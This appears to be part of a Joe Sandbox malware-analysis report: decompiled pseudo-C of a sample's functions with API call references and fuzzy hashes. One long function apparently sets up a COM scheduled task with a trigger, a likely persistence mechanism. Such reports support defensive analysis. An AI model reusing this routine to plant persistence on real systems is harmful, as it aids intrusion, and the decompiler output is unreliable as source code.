                          				if(_t8 > 0xffffffe0) {
                          					L7:
                          					 *((intOrPtr*)(E0134B45F(__eflags))) = 0xc;
                          					__eflags = 0;
                          					return 0;
                          				}
                          				if(_t8 == 0) {
                          					_t8 = _t8 + 1;
                          				}
                          				while(1) {
                          					_t4 = RtlAllocateHeap( *0x13ab7d8, 0, _t8); // executed
                          					if(_t4 != 0) {
                          						break;
                          					}
                          					__eflags = E01355057();
                          					if(__eflags == 0) {
                          						goto L7;
                          					}
                          					__eflags = E0135287B(__eflags, _t8);
                          					if(__eflags == 0) {
                          						goto L7;
                          					}
                          				}
                          				return _t4;
                          			}






                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,0135BEE9,00000220,0135F479,00013385,?,?,?,?,00000000,00000000,?,0135F479), ref: 0135771F
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: b8d621d44d2a7a4e203dda9c37677e824b32356e827b76855ca0c6ecfdf2e746
                          • Instruction ID: d455cdcaaad30b8144c76cde5c2dbd573904ce996ccd697bb0f403fecd656046
                          • Opcode Fuzzy Hash: b8d621d44d2a7a4e203dda9c37677e824b32356e827b76855ca0c6ecfdf2e746
                          • Instruction Fuzzy Hash: BDE0653110162556E7B13A6DAC00F7B7E8DDF41FE8F850121AE1596590DF60D80186E5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 50%
                          			E01356313(intOrPtr _a4, intOrPtr _a8) {
                          				void* _t9;
                          				intOrPtr* _t11;
                          
                          				_t11 = E01355E1D();
                          				if(_t11 == 0) {
                          					return E013563D2(GetUserDefaultLCID(), _a4, _a8, 0);
                          				}
                          				 *0x1374358(_a4, _a8); // executed
                          				_t9 =  *_t11(); // executed
                          				return _t9;
                          			}





                          APIs
                          • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,?,?,0135DBB6,?,00000055,00000050), ref: 0135633E
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: DefaultUser
                          • String ID:
                          • API String ID: 3358694519-0
                          • Opcode ID: ee10e432942621a66d0e6859eacd422004cf4a13558b634b4d66c8d27c252951
                          • Instruction ID: ae0445f0876bdb0406fd13aca8d322c5250d4a479be2ba1bc2ba6c426de9130a
                          • Opcode Fuzzy Hash: ee10e432942621a66d0e6859eacd422004cf4a13558b634b4d66c8d27c252951
                          • Instruction Fuzzy Hash: 3EE04F325001287BCB722A64DC09D9DBF1DAB50BA5F058021FD195A121CA3199619B80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 33%
                          			E01315BF0(void* __ebx, void* __ecx) {
                          				void* __edi;
                          				void* _t22;
                          				void* _t27;
                          				intOrPtr _t38;
                          				intOrPtr _t39;
                          				void* _t47;
                          				void* _t48;
                          
                          				_t36 = __ebx;
                          				_t47 = __ecx; // executed
                          				__imp__CoUninitialize(); // executed
                          				_t38 =  *((intOrPtr*)(__ecx + 0x10));
                          				if(_t38 != 0) {
                          					_push(_t38);
                          					E012F5650(_t38,  *((intOrPtr*)(__ecx + 0x14)));
                          					_push((0x2aaaaaab * ( *((intOrPtr*)(__ecx + 0x18)) -  *((intOrPtr*)(__ecx + 0x10))) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__ecx + 0x18)) -  *((intOrPtr*)(__ecx + 0x10))) >> 0x20 >> 2) + ((0x2aaaaaab * ( *((intOrPtr*)(__ecx + 0x18)) -  *((intOrPtr*)(__ecx + 0x10))) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__ecx + 0x18)) -  *((intOrPtr*)(__ecx + 0x10))) >> 0x20 >> 2)) * 2 << 3);
                          					_t22 = E012F56A0(__ebx, __ecx,  *((intOrPtr*)(__ecx + 0x10)));
                          					 *((intOrPtr*)(_t47 + 0x10)) = 0;
                          					_t48 = _t48 + 0xc;
                          					 *((intOrPtr*)(_t47 + 0x14)) = 0;
                          					 *((intOrPtr*)(_t47 + 0x18)) = 0;
                          				}
                          				_t39 =  *((intOrPtr*)(_t47 + 4));
                          				if(_t39 != 0) {
                          					_push(_t39);
                          					E01316850(_t39,  *((intOrPtr*)(_t47 + 8)));
                          					_push( *((intOrPtr*)(_t47 + 0xc)) -  *((intOrPtr*)(_t47 + 4)) & 0xffffffe0);
                          					_t27 = E012F56A0(_t36, _t47,  *((intOrPtr*)(_t47 + 4)));
                          					 *((intOrPtr*)(_t47 + 4)) = 0;
                          					 *((intOrPtr*)(_t47 + 8)) = 0;
                          					 *((intOrPtr*)(_t47 + 0xc)) = 0;
                          					return _t27;
                          				}
                          				return _t22;
                          			}










                          APIs
                          • CoUninitialize.OLE32(?,01310A7A), ref: 01315BF3
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Uninitialize
                          • String ID:
                          • API String ID: 3861434553-0
                          • Opcode ID: 58e32507c752c0015668c2230039418e3e4c2c12154045761f2b3d8478482d36
                          • Instruction ID: 225ddaca1eeb042809473ed486e6c149716e09d896c0ee2412d29e6aad0c4817
                          • Opcode Fuzzy Hash: 58e32507c752c0015668c2230039418e3e4c2c12154045761f2b3d8478482d36
                          • Instruction Fuzzy Hash: D101EDB5210A02ABD31CDF29D955B26FBB5BF90314F04872CD5258BA84C775F564CBD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          C-Code - Quality: 32%
                          			E012FAEE0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                          				intOrPtr _v8;
                          				char _v12;
                          				intOrPtr _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				unsigned int _v28;
                          				unsigned int _v32;
                          				char _v33;
                          				signed int _v36;
                          				signed int _v40;
                          				unsigned int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				void* _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				char _v109;
                          				char _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				char _v136;
                          				signed int _v140;
                          				short _v144;
                          				signed int _v152;
                          				char _v160;
                          				signed int _v168;
                          				signed int _v176;
                          				signed int _v184;
                          				char _v192;
                          				signed int _v196;
                          				signed int _v200;
                          				short _v216;
                          				signed int _v220;
                          				char _v240;
                          				char _v256;
                          				char _v264;
                          				short* _v428;
                          				char _v448;
                          				signed int _v452;
                          				char _v484;
                          				intOrPtr _v516;
                          				char _v520;
                          				short* _v528;
                          				short* _v560;
                          				signed int _v568;
                          				signed int* _v584;
                          				char _v600;
                          				intOrPtr _v604;
                          				char _v617;
                          				intOrPtr _v628;
                          				unsigned int _v632;
                          				intOrPtr _v640;
                          				intOrPtr _v652;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr _t448;
                          				signed int _t450;
                          				signed int _t451;
                          				char _t453;
                          				signed int* _t456;
                          				void* _t471;
                          				signed int _t480;
                          				signed int _t483;
                          				signed int _t490;
                          				signed int _t491;
                          				intOrPtr _t498;
                          				signed int _t499;
                          				signed int _t507;
                          				signed int _t521;
                          				signed int _t524;
                          				signed int* _t531;
                          				short* _t542;
                          				void* _t549;
                          				signed int _t551;
                          				signed int _t561;
                          				void* _t574;
                          				signed int _t576;
                          				signed int _t585;
                          				signed int _t587;
                          				void* _t590;
                          				signed int _t591;
                          				signed int _t592;
                          				signed int _t602;
                          				void* _t605;
                          				intOrPtr* _t610;
                          				signed int* _t611;
                          				signed int _t612;
                          				signed int _t613;
                          				signed int _t616;
                          				signed int _t619;
                          				signed int _t622;
                          				signed int _t625;
                          				signed int _t626;
                          				signed int _t628;
                          				signed int _t631;
                          				signed int _t633;
                          				signed int _t636;
                          				signed int _t641;
                          				intOrPtr* _t647;
                          				signed int* _t648;
                          				signed int _t649;
                          				signed int _t650;
                          				signed int _t652;
                          				signed int _t654;
                          				signed int _t656;
                          				intOrPtr* _t662;
                          				signed int* _t663;
                          				signed int _t664;
                          				signed int _t665;
                          				signed int _t666;
                          				signed int _t667;
                          				signed int _t669;
                          				signed int _t671;
                          				signed int _t672;
                          				signed int _t675;
                          				signed int _t677;
                          				signed int _t680;
                          				intOrPtr* _t684;
                          				signed int* _t685;
                          				signed int _t686;
                          				signed int _t687;
                          				signed int _t688;
                          				signed int _t690;
                          				signed int _t693;
                          				signed int _t694;
                          				signed int _t697;
                          				intOrPtr* _t699;
                          				signed int* _t700;
                          				signed int _t701;
                          				signed int _t708;
                          				signed int _t712;
                          				intOrPtr* _t717;
                          				intOrPtr* _t719;
                          				signed int _t721;
                          				signed int _t724;
                          				signed int _t725;
                          				signed int _t728;
                          				signed int _t729;
                          				intOrPtr* _t739;
                          				signed int _t741;
                          				signed int _t742;
                          				signed int _t751;
                          				signed int _t752;
                          				intOrPtr* _t755;
                          				signed int _t761;
                          				signed int _t762;
                          				signed int _t765;
                          				signed int _t766;
                          				signed int _t771;
                          				signed int _t772;
                          				void* _t775;
                          				void* _t780;
                          				signed int _t782;
                          				signed int _t783;
                          				signed int _t791;
                          				signed int _t799;
                          				signed int _t804;
                          				signed int _t805;
                          				signed int _t807;
                          				char _t808;
                          				signed int _t812;
                          				unsigned int _t813;
                          				signed int _t819;
                          				signed int _t820;
                          				unsigned int _t821;
                          				short* _t829;
                          				intOrPtr* _t830;
                          				intOrPtr* _t832;
                          				intOrPtr* _t833;
                          				intOrPtr* _t834;
                          				intOrPtr* _t835;
                          				intOrPtr* _t837;
                          				intOrPtr* _t840;
                          				intOrPtr* _t841;
                          				signed int _t842;
                          				intOrPtr* _t843;
                          				intOrPtr* _t845;
                          				intOrPtr* _t846;
                          				intOrPtr* _t847;
                          				intOrPtr* _t853;
                          				intOrPtr* _t854;
                          				signed int _t855;
                          				intOrPtr* _t856;
                          				signed int _t857;
                          				signed int _t860;
                          				signed int _t866;
                          				signed int _t867;
                          				intOrPtr* _t868;
                          				intOrPtr _t875;
                          				unsigned int _t877;
                          				unsigned int _t878;
                          				intOrPtr* _t901;
                          				signed int _t902;
                          				short* _t903;
                          				signed char* _t905;
                          				signed int _t907;
                          				intOrPtr _t908;
                          				signed int _t917;
                          				intOrPtr* _t918;
                          				void* _t920;
                          				intOrPtr* _t921;
                          				signed int _t923;
                          				signed int _t924;
                          				void* _t925;
                          				signed char* _t927;
                          				signed int _t928;
                          				intOrPtr _t929;
                          				intOrPtr _t930;
                          				signed int _t932;
                          				void* _t934;
                          				signed int _t937;
                          				void* _t939;
                          				signed int _t941;
                          				intOrPtr* _t944;
                          				signed int _t945;
                          				intOrPtr* _t949;
                          				signed int _t950;
                          				intOrPtr* _t952;
                          				signed int _t953;
                          				intOrPtr* _t956;
                          				signed int _t957;
                          				signed int _t963;
                          				signed int _t965;
                          				void* _t967;
                          				void* _t968;
                          				void* _t978;
                          				signed int _t981;
                          				void* _t982;
                          				void* _t988;
                          				signed int _t989;
                          				void* _t991;
                          				void* _t992;
                          				void* _t995;
                          				void* _t1015;
                          
                          				_t875 = _a4;
                          				if( *((intOrPtr*)(_t875 + 0x10)) == 0) {
                          					L3:
                          					return _t448;
                          				} else {
                          					_t448 = _a8;
                          					if( *((intOrPtr*)(_t448 + 0x10)) == 0) {
                          						goto L3;
                          					} else {
                          						_a8 = _t448;
                          						_a4 = _t875;
                          						_pop(_t961);
                          						_push(__ebx);
                          						_t780 = _t978;
                          						_t981 = (_t978 - 0x00000008 & 0xfffffff8) + 4;
                          						_v8 =  *((intOrPtr*)(_t780 + 4));
                          						_t963 = _t981;
                          						_push(0xffffffff);
                          						_push(0x13662bc);
                          						_push( *[fs:0x0]);
                          						_push(_t780);
                          						_t982 = _t981 - 0xe8;
                          						_t450 =  *0x13a4018; // 0x39cca9f6
                          						_t451 = _t450 ^ _t963;
                          						_v32 = _t451;
                          						_push(__edi);
                          						_push(_t451);
                          						 *[fs:0x0] =  &_v24;
                          						_t453 =  *((intOrPtr*)(_t780 + 8));
                          						_t791 =  *(_t780 + 0xc);
                          						_t876 =  *((intOrPtr*)(_t780 + 0x10));
                          						_v112 = _t453;
                          						_v96 = _t791;
                          						_v100 = _t876;
                          						if( *((intOrPtr*)(_t453 + 0x10)) == 0 || _t876 == 0 ||  *((intOrPtr*)(_t791 + 0x10)) == 0) {
                          							L73:
                          							goto L74;
                          						} else {
                          							__imp__CoInitializeEx(0, 0);
                          							__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 6, 3, 0, 0, 0);
                          							_t456 =  &_v48;
                          							_v48 = 0;
                          							__imp__CoCreateInstance(0x1378f5c, 0, 1, 0x1378f4c, _t456);
                          							if(_t456 < 0) {
                          								goto L73;
                          							} else {
                          								_t921 = __imp__#8;
                          								 *_t921( &_v256);
                          								_v20 = 0;
                          								asm("movups xmm0, [ebp-0xf0]");
                          								asm("movups [ebp-0xd8], xmm0");
                          								 *_t921( &_v160);
                          								asm("movups xmm0, [ebp-0x90]");
                          								asm("movups [ebp-0xc0], xmm0");
                          								 *_t921( &_v176);
                          								asm("movups xmm0, [ebp-0xa0]");
                          								asm("movups [ebp-0x78], xmm0");
                          								 *_t921( &_v192);
                          								_v20 = 3;
                          								asm("movups xmm0, [ebp-0xd8]");
                          								asm("movups [eax], xmm0");
                          								asm("movups xmm0, [ebp-0xc0]");
                          								asm("movups [eax], xmm0");
                          								_t988 = _t982 - 0xffffffffffffffe0;
                          								asm("movups xmm0, [ebp-0x78]");
                          								asm("movups [eax], xmm0");
                          								asm("movups xmm0, [ebp-0xb0]");
                          								asm("movups [eax], xmm0");
                          								_t471 =  *((intOrPtr*)( *((intOrPtr*)( *_v48 + 0x28))))(_v48);
                          								_t901 = __imp__#9;
                          								_t922 = _t471;
                          								 *_t901( &_v192);
                          								 *_t901( &_v176);
                          								 *_t901( &_v160);
                          								_v20 = 0xffffffff;
                          								 *_t901( &_v256);
                          								_t480 = _v48;
                          								_t1023 = _t471;
                          								if(_t471 < 0) {
                          									L72:
                          									 *((intOrPtr*)( *_t480 + 8))(_t480);
                          									goto L73;
                          								} else {
                          									_v44 = 0;
                          									_t902 =  *( *_t480 + 0x1c);
                          									_t483 = E0132EA8A(_t922, _t1023, 0xc);
                          									_t923 = _t483;
                          									_t989 = _t988 + 4;
                          									_v96 = _t923;
                          									_v20 = 4;
                          									if(_t923 == 0) {
                          										_t923 = 0;
                          										__eflags = 0;
                          										L13:
                          										_v20 = 0xffffffff;
                          										_v96 = _t923;
                          										if(_t923 == 0) {
                          											goto L162;
                          										} else {
                          											_v20 = 5;
                          											_t605 =  *_t902(_v48,  *_t923,  &_v44);
                          											_v20 = 0xffffffff;
                          											_v109 = _t605 < 0;
                          											_t902 = _t902 | 0xffffffff;
                          											asm("lock xadd [esi+0x8], eax");
                          											if(_t902 == 1) {
                          												_t775 =  *_t923;
                          												if(_t775 != 0) {
                          													__imp__#6(_t775);
                          													 *_t923 = 0;
                          												}
                          												_t776 =  *(_t923 + 4);
                          												if( *(_t923 + 4) != 0) {
                          													L0132ECE6(_t776);
                          													_t989 = _t989 + 4;
                          													 *(_t923 + 4) = 0;
                          												}
                          												_push(0xc);
                          												E0132EABA(_t923);
                          												_t989 = _t989 + 8;
                          											}
                          											if(_v109 == 0) {
                          												_t944 =  *((intOrPtr*)( *_v44 + 0x3c));
                          												_t610 = _v116;
                          												_t830 = _t610;
                          												__eflags =  *((intOrPtr*)(_t610 + 0x14)) - 8;
                          												if(__eflags >= 0) {
                          													_t830 =  *_t610;
                          												}
                          												_t611 = E012F9580( &_v96, __eflags, _t830);
                          												_v20 = 6;
                          												_t612 =  *_t611;
                          												__eflags = _t612;
                          												if(_t612 == 0) {
                          													_t613 = 0;
                          													__eflags = 0;
                          												} else {
                          													_t613 =  *_t612;
                          												}
                          												 *_t944(_v44, _t613, 0);
                          												_v20 = 0xffffffff;
                          												_t945 = _v96;
                          												__eflags = _t945;
                          												if(_t945 != 0) {
                          													asm("lock xadd [esi+0x8], eax");
                          													__eflags = _t902 == 1;
                          													if(_t902 == 1) {
                          														__eflags = _t945;
                          														if(_t945 != 0) {
                          															_t771 =  *_t945;
                          															__eflags = _t771;
                          															if(_t771 != 0) {
                          																__imp__#6(_t771);
                          																 *_t945 = 0;
                          															}
                          															_t772 =  *(_t945 + 4);
                          															__eflags = _t772;
                          															if(_t772 != 0) {
                          																L0132ECE6(_t772);
                          																_t989 = _t989 + 4;
                          																 *(_t945 + 4) = 0;
                          															}
                          															_push(0xc);
                          															E0132EABA(_t945);
                          															_t989 = _t989 + 8;
                          														}
                          													}
                          												}
                          												_t832 = _v48;
                          												_v40 = 0;
                          												_t616 =  *((intOrPtr*)( *_t832 + 0x24))(_t832, 0,  &_v40);
                          												_t833 = _v48;
                          												 *((intOrPtr*)( *_t833 + 8))(_t833);
                          												__eflags = _t616;
                          												if(_t616 >= 0) {
                          													_t834 = _v40;
                          													_v64 = 0;
                          													_t619 =  *((intOrPtr*)( *_t834 + 0x3c))(_t834,  &_v64);
                          													__eflags = _t619;
                          													if(_t619 < 0) {
                          														goto L36;
                          													} else {
                          														_t835 = _v64;
                          														 *((intOrPtr*)( *_t835 + 0x48))(_t835, 1);
                          														_t622 = _v64;
                          														 *((intOrPtr*)( *_t622 + 8))(_t622);
                          														_t837 = _v40;
                          														_v84 = 0;
                          														_t625 =  *((intOrPtr*)( *_t837 + 0x1c))(_t837,  &_v84);
                          														__eflags = _t625;
                          														if(_t625 < 0) {
                          															L115:
                          															_t626 = _v44;
                          															goto L71;
                          														} else {
                          															_t628 = _v84;
                          															 *((intOrPtr*)( *_t628 + 8))(_t628);
                          															_t840 = _v40;
                          															_v68 = 0;
                          															_t631 =  *((intOrPtr*)( *_t840 + 0x24))(_t840,  &_v68);
                          															__eflags = _t631;
                          															if(_t631 < 0) {
                          																goto L115;
                          															} else {
                          																_t841 = _v68;
                          																_v72 = 0;
                          																_t633 =  *((intOrPtr*)( *_t841 + 0x28))(_t841, 2,  &_v72);
                          																_t842 = _v68;
                          																 *((intOrPtr*)( *_t842 + 8))(_t842);
                          																__eflags = _t633;
                          																if(_t633 < 0) {
                          																	goto L115;
                          																} else {
                          																	_t843 = _v72;
                          																	_v52 = 0;
                          																	_t636 =  *((intOrPtr*)( *_t843))(_t843, 0x1378f3c,  &_v52);
                          																	_t791 = _v72;
                          																	_t948 = _t636;
                          																	_t876 =  *_t791;
                          																	 *((intOrPtr*)( *_t791 + 8))(_t791);
                          																	__eflags = _t636;
                          																	if(__eflags < 0) {
                          																		goto L115;
                          																	} else {
                          																		_v96 =  *((intOrPtr*)( *_v52 + 0x24));
                          																		_t641 = E0132EA8A(_t948, __eflags, 0xc);
                          																		_t923 = _t641;
                          																		_t989 = _t989 + 4;
                          																		_v108 = _t923;
                          																		_v20 = 7;
                          																		__eflags = _t923;
                          																		if(_t923 == 0) {
                          																			_t923 = 0;
                          																			__eflags = 0;
                          																			goto L46;
                          																		} else {
                          																			asm("xorps xmm0, xmm0");
                          																			asm("movq [esi], xmm0");
                          																			 *(_t923 + 8) = 0;
                          																			 *(_t923 + 4) = 0;
                          																			 *(_t923 + 8) = 1;
                          																			__imp__#2(L"Trigger1");
                          																			 *_t923 = _t641;
                          																			__eflags = _t641;
                          																			if(_t641 == 0) {
                          																				goto L163;
                          																			} else {
                          																				L46:
                          																				_v20 = 0xffffffff;
                          																				_v108 = _t923;
                          																				__eflags = _t923;
                          																				if(_t923 == 0) {
                          																					goto L162;
                          																				} else {
                          																					_v20 = 8;
                          																					_v96(_v52,  *_t923);
                          																					_v20 = 0xffffffff;
                          																					asm("lock xadd [esi+0x8], eax");
                          																					__eflags = _t902 == 1;
                          																					if(_t902 == 1) {
                          																						_t765 =  *_t923;
                          																						__eflags = _t765;
                          																						if(_t765 != 0) {
                          																							__imp__#6(_t765);
                          																							 *_t923 = 0;
                          																						}
                          																						_t766 =  *(_t923 + 4);
                          																						__eflags = _t766;
                          																						if(_t766 != 0) {
                          																							L0132ECE6(_t766);
                          																							_t989 = _t989 + 4;
                          																							 *(_t923 + 4) = 0;
                          																						}
                          																						_push(0xc);
                          																						E0132EABA(_t923);
                          																						_t989 = _t989 + 8;
                          																					}
                          																					_push(_t791);
                          																					_t949 =  *((intOrPtr*)( *_v52 + 0x3c));
                          																					_t647 =  &_v144;
                          																					_push(_t647);
                          																					L167();
                          																					_v20 = 9;
                          																					__eflags =  *((intOrPtr*)(_t647 + 0x14)) - 8;
                          																					if(__eflags >= 0) {
                          																						_t647 =  *_t647;
                          																					}
                          																					_t648 = E012F9580( &_v96, __eflags, _t647);
                          																					_v20 = 0xa;
                          																					_t649 =  *_t648;
                          																					__eflags = _t649;
                          																					if(_t649 == 0) {
                          																						_t650 = 0;
                          																						__eflags = 0;
                          																					} else {
                          																						_t650 =  *_t649;
                          																					}
                          																					 *_t949(_v52, _t650);
                          																					_t950 = _v96;
                          																					__eflags = _t950;
                          																					if(_t950 != 0) {
                          																						asm("lock xadd [esi+0x8], eax");
                          																						__eflags = _t902 == 1;
                          																						if(_t902 == 1) {
                          																							__eflags = _t950;
                          																							if(_t950 != 0) {
                          																								_t761 =  *_t950;
                          																								__eflags = _t761;
                          																								if(_t761 != 0) {
                          																									__imp__#6(_t761);
                          																									 *_t950 = 0;
                          																								}
                          																								_t762 =  *(_t950 + 4);
                          																								__eflags = _t762;
                          																								if(_t762 != 0) {
                          																									L0132ECE6(_t762);
                          																									_t989 = _t989 + 4;
                          																									 *(_t950 + 4) = 0;
                          																								}
                          																								_push(0xc);
                          																								E0132EABA(_t950);
                          																								_t989 = _t989 + 8;
                          																							}
                          																						}
                          																						_v96 = 0;
                          																					}
                          																					_v20 = 0xffffffff;
                          																					_t652 = _v124;
                          																					__eflags = _t652 - 8;
                          																					if(_t652 >= 8) {
                          																						_push(2 + _t652 * 2);
                          																						E012F56A0(_t780, _t902, _v144);
                          																						_t989 = _t989 + 8;
                          																					}
                          																					_t845 = _v52;
                          																					_t654 =  *((intOrPtr*)( *_t845 + 0x54))(_t845, 1);
                          																					__eflags = _t654;
                          																					if(_t654 >= 0) {
                          																						_t846 = _v52;
                          																						_v56 = 0;
                          																						_t656 =  *((intOrPtr*)( *_t846 + 0x28))(_t846,  &_v56);
                          																						_t847 = _v52;
                          																						 *((intOrPtr*)( *_t847 + 8))(_t847);
                          																						__eflags = _t656;
                          																						if(_t656 < 0) {
                          																							goto L115;
                          																						} else {
                          																							_t952 =  *((intOrPtr*)( *_v56 + 0x20));
                          																							E012F8010(_t780,  &_v264, _v104, _t902);
                          																							asm("movups xmm0, [ebp-0xf8]");
                          																							asm("movups [ebp-0xe0], xmm0");
                          																							asm("movq xmm0, [ebp-0xe8]");
                          																							asm("movq [ebp-0xd0], xmm0");
                          																							_v20 = 0xb;
                          																							_push( &_v240);
                          																							L222();
                          																							_v20 = 0xc;
                          																							_t662 = E012F8470( &_v144,  &_v240, "M");
                          																							_t989 = _t989 + 8;
                          																							_v20 = 0xd;
                          																							__eflags =  *((intOrPtr*)(_t662 + 0x14)) - 8;
                          																							if(__eflags >= 0) {
                          																								_t662 =  *_t662;
                          																							}
                          																							_t663 = E012F9580( &_v96, __eflags, _t662);
                          																							_v20 = 0xe;
                          																							_t664 =  *_t663;
                          																							__eflags = _t664;
                          																							if(_t664 == 0) {
                          																								_t665 = 0;
                          																								__eflags = 0;
                          																							} else {
                          																								_t665 =  *_t664;
                          																							}
                          																							_t666 =  *_t952(_v56, _t665);
                          																							_t953 = _v96;
                          																							_v104 = _t666;
                          																							__eflags = _t953;
                          																							if(_t953 != 0) {
                          																								asm("lock xadd [esi+0x8], ecx");
                          																								__eflags = _t902 == 1;
                          																								if(_t902 == 1) {
                          																									__eflags = _t953;
                          																									if(_t953 != 0) {
                          																										_t751 =  *_t953;
                          																										__eflags = _t751;
                          																										if(_t751 != 0) {
                          																											__imp__#6(_t751);
                          																											 *_t953 = 0;
                          																										}
                          																										_t752 =  *(_t953 + 4);
                          																										__eflags = _t752;
                          																										if(_t752 != 0) {
                          																											L0132ECE6(_t752);
                          																											_t989 = _t989 + 4;
                          																											 *(_t953 + 4) = 0;
                          																										}
                          																										_push(0xc);
                          																										E0132EABA(_t953);
                          																										_t989 = _t989 + 8;
                          																									}
                          																								}
                          																								_v96 = 0;
                          																							}
                          																							_t667 = _v124;
                          																							__eflags = _t667 - 8;
                          																							if(_t667 >= 8) {
                          																								_push(2 + _t667 * 2);
                          																								E012F56A0(_t780, _t902, _v144);
                          																								_t989 = _t989 + 8;
                          																							}
                          																							_v128 = 0;
                          																							_v144 = 0;
                          																							_t669 = _v196;
                          																							_v124 = 7;
                          																							__eflags = _t669 - 8;
                          																							if(_t669 >= 8) {
                          																								_push(2 + _t669 * 2);
                          																								E012F56A0(_t780, _t902, _v216);
                          																								_t989 = _t989 + 8;
                          																							}
                          																							_v20 = 0xffffffff;
                          																							_v216 = 0;
                          																							_t671 = _v220;
                          																							_v200 = 0;
                          																							_v196 = 7;
                          																							__eflags = _t671 - 8;
                          																							if(_t671 >= 8) {
                          																								_push(2 + _t671 * 2);
                          																								E012F56A0(_t780, _t902, _v240);
                          																								_t989 = _t989 + 8;
                          																							}
                          																							_t672 = _v56;
                          																							 *((intOrPtr*)( *_t672 + 8))(_t672);
                          																							__eflags = _v104;
                          																							if(_v104 < 0) {
                          																								goto L115;
                          																							} else {
                          																								_t853 = _v40;
                          																								_v76 = 0;
                          																								_t675 =  *((intOrPtr*)( *_t853 + 0x44))(_t853,  &_v76);
                          																								__eflags = _t675;
                          																								if(_t675 < 0) {
                          																									goto L115;
                          																								} else {
                          																									_t854 = _v76;
                          																									_v80 = 0;
                          																									_t677 =  *((intOrPtr*)( *_t854 + 0x30))(_t854, 0,  &_v80);
                          																									_t855 = _v76;
                          																									 *((intOrPtr*)( *_t855 + 8))(_t855);
                          																									__eflags = _t677;
                          																									if(_t677 < 0) {
                          																										goto L115;
                          																									} else {
                          																										_t856 = _v80;
                          																										_v60 = 0;
                          																										_t680 =  *((intOrPtr*)( *_t856))(_t856, 0x1378f6c,  &_v60);
                          																										_t857 = _v80;
                          																										 *((intOrPtr*)( *_t857 + 8))(_t857);
                          																										__eflags = _t680;
                          																										if(_t680 < 0) {
                          																											goto L115;
                          																										} else {
                          																											_t956 =  *((intOrPtr*)( *_v60 + 0x2c));
                          																											_t684 = _v100;
                          																											__eflags =  *((intOrPtr*)(_t684 + 0x14)) - 8;
                          																											if(__eflags >= 0) {
                          																												_t684 =  *_t684;
                          																											}
                          																											_t685 = E012F9580( &_v100, __eflags, _t684);
                          																											_v20 = 0xf;
                          																											_t686 =  *_t685;
                          																											__eflags = _t686;
                          																											if(_t686 == 0) {
                          																												_t687 = 0;
                          																												__eflags = 0;
                          																											} else {
                          																												_t687 =  *_t686;
                          																											}
                          																											_t688 =  *_t956(_v60, _t687);
                          																											_v20 = 0xffffffff;
                          																											_t923 = _v100;
                          																											_v104 = _t688;
                          																											__eflags = _t923;
                          																											if(_t923 != 0) {
                          																												asm("lock xadd [esi+0x8], ecx");
                          																												__eflags = _t902 == 1;
                          																												if(_t902 == 1) {
                          																													__eflags = _t923;
                          																													if(_t923 != 0) {
                          																														_t741 =  *_t923;
                          																														__eflags = _t741;
                          																														if(_t741 != 0) {
                          																															__imp__#6(_t741);
                          																															 *_t923 = 0;
                          																														}
                          																														_t742 =  *(_t923 + 4);
                          																														__eflags = _t742;
                          																														if(_t742 != 0) {
                          																															L0132ECE6(_t742);
                          																															_t989 = _t989 + 4;
                          																															 *(_t923 + 4) = 0;
                          																														}
                          																														_push(0xc);
                          																														E0132EABA(_t923);
                          																														_t688 = _v104;
                          																														_t989 = _t989 + 8;
                          																													}
                          																												}
                          																											}
                          																											__eflags = _t688;
                          																											if(_t688 >= 0) {
                          																												_t791 = _v40;
                          																												_t876 =  &_v88;
                          																												_t690 =  *((intOrPtr*)( *_t791 + 0x2c))(_t791,  &_v88);
                          																												__eflags = _t690;
                          																												if(_t690 >= 0) {
                          																													_t868 = _v88;
                          																													 *((intOrPtr*)( *_t868 + 0x98))(_t868, 0xffffffff);
                          																													_t791 = _v40;
                          																													 *((intOrPtr*)( *_t791 + 0x30))(_t791, _v88);
                          																												}
                          																												_t902 = 8;
                          																												_v92 = 0;
                          																												_v192 = 8;
                          																												_t693 =  *( *_v44 + 0x44);
                          																												_v96 = _t693;
                          																												__imp__#2(0x13836c0);
                          																												_v184 = _t693;
